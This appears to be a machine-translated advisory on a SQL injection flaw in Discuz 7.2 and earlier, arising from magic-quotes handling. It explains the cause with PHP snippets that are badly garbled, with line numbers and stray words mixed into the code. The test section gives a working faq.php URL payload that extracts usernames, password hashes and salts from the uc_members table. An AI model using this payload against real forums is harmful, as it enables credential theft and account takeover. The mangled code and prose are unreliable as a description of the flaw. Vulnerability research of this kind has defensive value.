Discuz <= 7.2 SQL Injection Vulnerability Details

Discuz tall tree catches has become the norm, but is it not so for other whole-site programs? Have you ever remembered the scene of the Phpcms and Dedcms of Daming Lake, the most important thing in the popular whole station is the quick response of the loophole.

0x01 vulnerability Causes:

In the section "new security issues with magic quotes" in the article "Advanced PHP Application Vulnerability Audit Technology", there is a reference to the security problem of "\" characters generated by extracting magic quotes, and again this is the perfect embodiment of this problem, as in the following code snippet:

1 //foo.php?xigr= ' Ryat2 3 functionDaddslashes ($string,$force= 0) {4!defined(' MAGIC_QUOTES_GPC ') &&Define(' MAGIC_QUOTES_GPC ',GET_MAGIC_QUOTES_GPC());5 if(! MAGIC_QUOTES_GPC | |$force) {6 if(Is_array($string)) {7 foreach($string  as $key=$val) {8 $string[$key] = Daddslashes ($val,$force);9 }Ten}Else { One $string=addslashes($string); A } - } - return $string; the } -... - foreach(Array(' _cookie ', ' _post ', ' _get ') as $_request) { - foreach($$_request  as $_key=$_value) { + $_key{0}! = ' _ ' && $$_key= Daddslashes ($_value); - } + } A   at Echo $XIGR[' Hi '];

The above code originally expected to get an array variable $xigr[' Hi ' after daddslashes (), but did not make strict type rules on the variable $xigr, when we commit a string variable $xigr= ' Ryat, after the above processing becomes \ ' Ryat , the last $xigr[' Hi ' will output \, if this variable is introduced into the SQL statement, then it will cause serious security problems, and then look at the following code snippet:

 1  if  (  $xigr    foreach  ( $xigr  as   $k  =  $v  ) { 3   $uids  [] =  $v  [' uid ' ]; 4   5   $query  =  $db ->query ("Select UID from the Users WHERE uid in (' ".  Implode  ("', '",  $uids ). "')"; 

Using the above-mentioned ideas, it is easy to break through GPC or similar security processing by submitting the foo.php?xigr[]= ' &xigr[][uid]=evilcode, which forms a SQL injection vulnerability.

0x02 Vulnerability Test

Statements to test the presence of a vulnerability & burst account + password +salt:

http://

http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20% 28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt% 29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables% 20group%20by%20x%29a%29%23

　　Integrated self-freebuf analysis & Http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x03.txt